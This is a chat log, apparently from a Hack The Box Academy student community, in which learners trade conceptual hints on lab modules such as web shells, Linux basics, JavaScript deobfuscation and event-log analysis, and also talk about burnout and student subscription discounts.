so i did import powerview and it worked...with GetDomain and the text

Hi, in the shells&payloads module, the antak shell section, I got the shell on the system and whoami but it is refusing the answer

make sure you upload it to the right subdomain

there is a difference

Nope

Same as the one before

like i said

Status.inlanefreight.local

there is a difference in when you upload/access via the right subdomain

one gets you the /application or whatever the other gets you the other one

Wdym?

you should get a iis apppool\'name'

in whoami

Yes

I got that

Can I show what I got with spoiler tag?

Maybe take to DM if you think what you're going to post includes spoilers

(if MarcieLee is ok with it)

i'm taking a moment to upload and check

👀

yep i get the intended answer doing exactly what's described

dm me and include the browser url at the top that you're using

Ok

im trying to find the history in home directory but cant find it when I type in ls -la, what am i doing wrong?

history is .bashhistory

i dont see it in my home directory tho

that's because you're not in your home directory

it's /home/htb-student

or ~

ouh...

so thats what they meant by home for htb student

...

thanks alot

yeah

i was confused

i thought diff home dir

~ is shorthand for /home/$USER

btw

Any day you learn something is a good day.

humu i see thanks!

you can also just do cd without any args and it'll take you home

ouh yeah learned that bfr kinda forgot abt it

thanks for sharing tho

the second question i had to google tho cuz i refered the section it didnt rlly show how to do it

like checking the sudoers index number

well it comes with some research

you know ls lists info

you can do something like man ls or ls -h to find out other flags aside from the shown -la flags

man hole
No manual entry for hole

that made me snort

touch grass                                    
touch: cannot touch 'grass': Permission denied

haaahaha

what are good machines for wordpress hacking? I just finish that module and want more practice

Use that academy x path feature

then?

Also iirc after completing a module I think if u scrolled you would find like tons of stuffs

Then you would find what you r looking for

wtf lol I did get u homie

It's actually academy x htb labs

https://academy.hackthebox.com/htb-relations/modules/hacking-wordpress

guys, is lowered attention span, aka getting distracted easier a sympton of burn out? been doing academy every day all day for the past week.

yes

you're losing some level of interest in grinding it out

limit time to a few hours or don't be afraid to just step away for a day or two

let your mind rest and absorb your recently learned info

Same, but gotta do what must be done to succeed

ugh, unfortunately...

It requires some extra efforts to be the protagonist

ngl bro; this ain't it chief

gotta see what's the minimum break to get back at it... currently trying to power through the digital forensics module, (almost done with the path)

holy shit, this is awesome.... thank you sir!

just step away for a day or two, then sit back down and get back at it

maybe go back and recheck what you've done previously

Yeah that feature is just outside of the world XD

thanks for the tip 🙂

And don't forget to

yeah, touch some grass homie

also as a note: make sure you take time for your hobbies outside of learning

Fine..I'll go touch grass then lol

while yes you want to break in: this course isnt graded - there's no pressure aside from what you put on yourself

💯 this, a step away, a shower, a walk.. something to take your mind off of it and you'll be surprised how often the answer comes to you, or at least another ideal for approaching it

I was feeling the same way in the last two week. What I did just take three days off with not tech near me. Go hiking with my dog. I feel 100% better

and even then renewed inspiration to keep working at it

Why it's important to not get too focused on a challenge or machine on an exam, just keep moving. Timehole yourself

yeah, totally agree with Marcie

when you step away you give your chance a moment to just think about stuff

without a singular focus

You ever think about something.. then two minutes later forget it.. just stop, don't think about trying to remember. It'll come back

it's why tests are "hard" because you're given a time limit, and your brain overcomplicates the tiniest detail

and you get the result back and it's SO obvious

because you had a chance to step away

I'll take a break this afternoon, that's a start. Thanks guys :))))

What if my hobbies is hacking?

You got this 😄

Make something, break something, do anything other than what you are struggling with

dude u just made my day ngl. That shit is awesome

🤣

Do i need to pay extra if I have the academy subs?

What do you mean?

you need VIP(+) on the main platform to access the retired machines

there's no cross-platform subs

Not yet 👀

would be a neat selling point for the annual subs 💸 💸 💸 💸

That would honestly be better

Aye for sure

2024 gonna be good 😄

HTB users in 2024 gonna be eating good

|||Pretends To not be on students sub|||

now go g0b before marketing gets mad at you

god damn

They can't touch me, they're in another country

LMAO

...but they could fly out here

Ah crap

they have your address

they know where you live

Our prayers for the brave soldier

is there a discount for vip students?

$20 per month is a lot for this soul

If you're subscribing from an educational istitution there is, but there's a bit more to it

oh nice

And this soul

https://help.hackthebox.com/en/articles/7973133-getting-the-student-subscription

That's for the Acedemy. I think there's something similar for VIP/ VIP+ too, but TLDR you gotta get your University / College on boarded

meanwhile I ||rigged|| got my silver annual from the giveaway

https://help.hackthebox.com/en/articles/5191693-do-you-provide-special-pricing-for-universities-what-are-the-eligibility-criteria-for-it

OMG you haxxored it Marcie?

Shame

Who in the uni I should contact

Your tutor

ah never mind. My school don't even know this shit exist lmao

My university is off due to a stupid war so I don't think I can contact high authorities

are u in gaza?

:v

And does my tutor needs to know about HTB?

Generally the institution would need to be registered with HTB in order to benefit from Student discounts

Sudan

I will proposed that in the next club meeting. They have enough funds for nonsense stuff

It was registered during the uni ctf

You'd benefit from the discount upon an institution email address, or via manual verification via our support team (first link I shared pertaining to Academy)

oh

i didn't know sudan was in war, with who ?

Nice, then they are already aware of HTB. You should be able to get them to register as an institution on the platforms. Then you and your classmates can benefit from the discounts.

Nice -

Explain to them the value of it to you as a student

Sorry, salesman mode off.

Is it mostly white box?

I don't think politics are allowed here but if you want to know u can dm

The modules lead you through the techniques, and there are exercises at the end to show that you have understood the techniques covered.

That's great, ty

sir that wont work

You aren't just throw in to a machine blind, there's a lot of content to help you gain knowledge in order to progress

😂

I did the manual verification for the academy sub, so I should do that for the main plat?or do I still need to get someone evolved?

They said the college is currently closed due to war

Honestly I'm not sure.. speaking to the support team and explaining your position would be the best bet.

If it's closed and they aren't able to work, that's a shitty situation 😦

Without engagement from the institution, it'd be hard to verify

Hope you're staying safe ❤️

Yeah that is what is happening, been in a 9 month vacation

Damn I'm sorry to hear that 😦

So what do I need from my institution to do?

The links I shared cover it

i just sent u a best friend request

Accepted my fren

So basically they are the ones who should be buying it and not me?

For Academy, I believe if the institution registers and you have a educational email address you can purchase yourself

Otherwise yes, then the institution would need to purchase

There is an option on Academy if you don't have an academic email address however

Unsure about our other platform however

if theyve already signed up for uni-ctf in the past Id assume HTB already has them internally recognized, so itd just be a matter of messaging support to review it and get you eligible

Yeah as said.. reach out to support, they'll do what they can

I think I should better contact the support my self to know what is required

(im assuming this is to get student sub)

Thank you very much

I am now on the academy student sub, I was looking for the vip sub discount

I didnt think there was a student vip discount

but I could be wrong

There is on VIP, but it requires purchase from the institution. Academy is more self serving

https://help.hackthebox.com/en/articles/5191693-do-you-provide-special-pricing-for-universities-what-are-the-eligibility-criteria-for-it

ah gotcha, that does make things complicated for them then

Maybe they can get a Sudan ambassador to vouch for em 😂

The copium from this statement is enough to end world hunger

Politicians can be weird. you have no idea what strings they can randomly pull if you dont ask

They could go 'hey we have a promising young hacker trying to increase their skills but are roadblocked due to the war climate. lets pull some strings to get them sorted out'

ive seen weirder shit happen

Hey all I am on the java deobfuscation skills assessment. I was able to get all answers but one As you may have noticed, the JavaScript code is obfuscated. Try applying the skills you learned in this module to deobfuscate the code, and retrieve the 'flag' variable.

What do they mean by flag variable

you would find it once you de obfuscate it

Use the techiniques thought so far and deobfuscate the Javascript code. || the flag is assigned to a javascript variable ||

it means a variable, probably named flag

do you have any background knowledge about JavaScript or programming of any kind?

https://www.programiz.com/javascript/online-compiler/ 😄

I'm working in the Linux Fundamentals module and got to the question about how many total packages are installed on the target system. I thought "apt list --installed | wc -l" would give me the correct answer but it keeps saying my answer is incorrect. Without giving me the answer, is there some other place I should be looking?

This might be helpful

Instead of wc pipe to head -n 5 and see if you find why it's wrong

Thank you!!

Stupid extra info bits

@fathom pendant I do not but I did find the answer for one of the other questions with the website you provided. That is not the one I am stuck on sadly

More like stupid rookie mistake, but I appreciate your help.

What is a variable is the question you should first ask

Once it's unpacked: then it's obvious

@fathom pendant I dm'd you I feel like I am really close

but I have tried variations of the same flag

I believe if you just run it, it gives you the answer

With no extra bits

:) it's also a nice warning

Haha I must have messed it up when I tried to manually remove the bits. I did a notepad replace all and that did the trick

thanks Again @fathom pendant

If you just run it, you'll get the same thing 😉

hi!! Im trying to do the module 'Searching for Accounts in Group Policy Objects' from CrackMapExec, and it is giving me this error. Can someone help me?

Try increasing the SMB timeout in crackmapexec.

--smb-timeout

yeah that worked

@misty current thank you!

Hi everyone,

I'm currently delving into the Windows Event Logs & Finding Evil module.
I'm trying to find the answer to the first question in the skills assessment, but I'm probably barking up the wrong tree.

The question is:
' By examining the logs located in the "C:\Logs\DLLHijack" directory, determine the process responsible for executing a DLL hijacking attack' (.exe file)

Now, I will briefly explain what my approach is. I have:

1. Opened the folder in the 'Logs' directory, then the .evtx file
2. Filter the log by event ID 7
3. Ctrl + F to sift through suspicious entries with no signature (by searching 'false')

(I have already modified the sysmonconfig-export.xml to ensure that nothing is excluded)

Unfortunately, I can't find any useful information.
Can you please give me a hand?

Thank you so much!

Hello everyone,

I'm currently stuck at the skill assessment of the "Parameter Logic Bugs" module.
There should be a vulnerability in this code which allows you to get a subscription with unlimited access but I'm not able to find it.
I found a way to get subscriptions for free but not the one I need. The other ways to get there seems a dead end as well.
Any hints are welcome here. Thank you a lot 🙂

dm me

hi everyone,
i don't get the question
i ran a sub-domain scan with ffuf and found 3, but none of them works as a valid answer

it's probably looking for subdomain1 subdomain2 subdomain3

yep... that's it 🤣

i mean it does say "What are all the subdomains"

yes, but how can i know its not csv

the answer format was clarifying not 1, 2, 3

by saying "only write the sub-domain name"

:P

yes maybe my english is not as good as i thought lol

Hello, what can i do if the password to ssh don't work. Execpt htb support.

what ssh password, what module

more context is needed LOL

introduction to windows command line - Skills Assessment

the password is "previous flag" i am stuck on this one

the password isn't literally "previous flag"

Yes

it's the answer of the previous question

iirc

this

it's the same for the rest of the questions, each question after the first - password is the answer(flag) of the previous question

Ok thanks